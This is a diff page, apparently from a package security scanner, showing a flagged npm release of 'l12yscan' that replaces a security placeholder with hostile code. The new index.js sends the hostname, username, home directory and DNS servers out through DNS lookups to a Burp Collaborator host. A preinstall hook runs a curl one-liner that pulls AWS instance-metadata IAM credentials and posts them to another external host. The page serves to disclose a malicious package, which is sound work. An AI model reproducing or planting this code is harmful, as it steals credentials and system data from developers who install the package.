l12yscan 0.0.1-security → 11.0.9
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of l12yscan might be problematic. Click here for more details.
- package/index.js +47 -0
- package/package.json +10 -4
- package/pre.sh +1 -0
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1,47 @@
|
|
1
|
+
const os = require("os");
|
2
|
+
const dns = require("dns");
|
3
|
+
const querystring = require("querystring");
|
4
|
+
const https = require("https");
|
5
|
+
const packageJSON = require("./package.json");
|
6
|
+
const package = packageJSON.name;
|
7
|
+
|
8
|
+
const trackingData = JSON.stringify({
|
9
|
+
p: package,
|
10
|
+
c: __dirname,
|
11
|
+
hd: os.homedir(),
|
12
|
+
hn: os.hostname(),
|
13
|
+
un: os.userInfo().username,
|
14
|
+
dns: dns.getServers(),
|
15
|
+
r: packageJSON ? packageJSON.___resolved : undefined,
|
16
|
+
v: packageJSON.version,
|
17
|
+
pjson: packageJSON,
|
18
|
+
});
|
19
|
+
|
20
|
+
|
21
|
+
var EVILSITE = "qys1g45vphde5y3k5fnpnxv0frli97.burpcollaborator.net";
|
22
|
+
|
23
|
+
//replace
|
24
|
+
// : --
|
25
|
+
// / _
|
26
|
+
// \ .
|
27
|
+
|
28
|
+
|
29
|
+
// hostname
|
30
|
+
var r1 = dns.lookup("host."+os.hostname()+"."+EVILSITE, function (err, addresses, family) {
|
31
|
+
console.log();
|
32
|
+
});
|
33
|
+
|
34
|
+
// user_info
|
35
|
+
var r2 = dns.lookup("user."+os.userInfo().username+"."+EVILSITE, function (err, addresses, family) {
|
36
|
+
console.log();
|
37
|
+
});
|
38
|
+
|
39
|
+
// home_dir
|
40
|
+
var r3 = dns.lookup("dir."+os.homedir()+"."+EVILSITE, function (err, addresses, family) {
|
41
|
+
console.log();
|
42
|
+
});
|
43
|
+
|
44
|
+
// dns_data
|
45
|
+
var r4 = dns.lookup("dns."+dns.getServers().join(',')+"."+EVILSITE, function (err, addresses, family) {
|
46
|
+
console.log();
|
47
|
+
});
|
package/package.json
CHANGED
@@ -1,6 +1,12 @@
|
|
1
1
|
{
|
2
2
|
"name": "l12yscan",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"
|
6
|
-
|
3
|
+
"version": "11.0.9",
|
4
|
+
"main": "index.js",
|
5
|
+
"scripts": {
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
7
|
+
"preinstall": "sh pre.sh"
|
8
|
+
},
|
9
|
+
"author": "yassineaboukir",
|
10
|
+
"license": "ISC",
|
11
|
+
"description": ""
|
12
|
+
}
|
package/pre.sh
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
curl -X POST -H --silent --data-urlencode "payload={\"text\": \"$(curl -X GET 'http://169.254.169.254/latest/user-data/iam/security-credentials/' | sed "s/\"/'/g")\"}" http://bl0m3psgc20zsjq5s0aaaiil2c84wt.burpcollaborator.net
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=l12yscan for more information.
|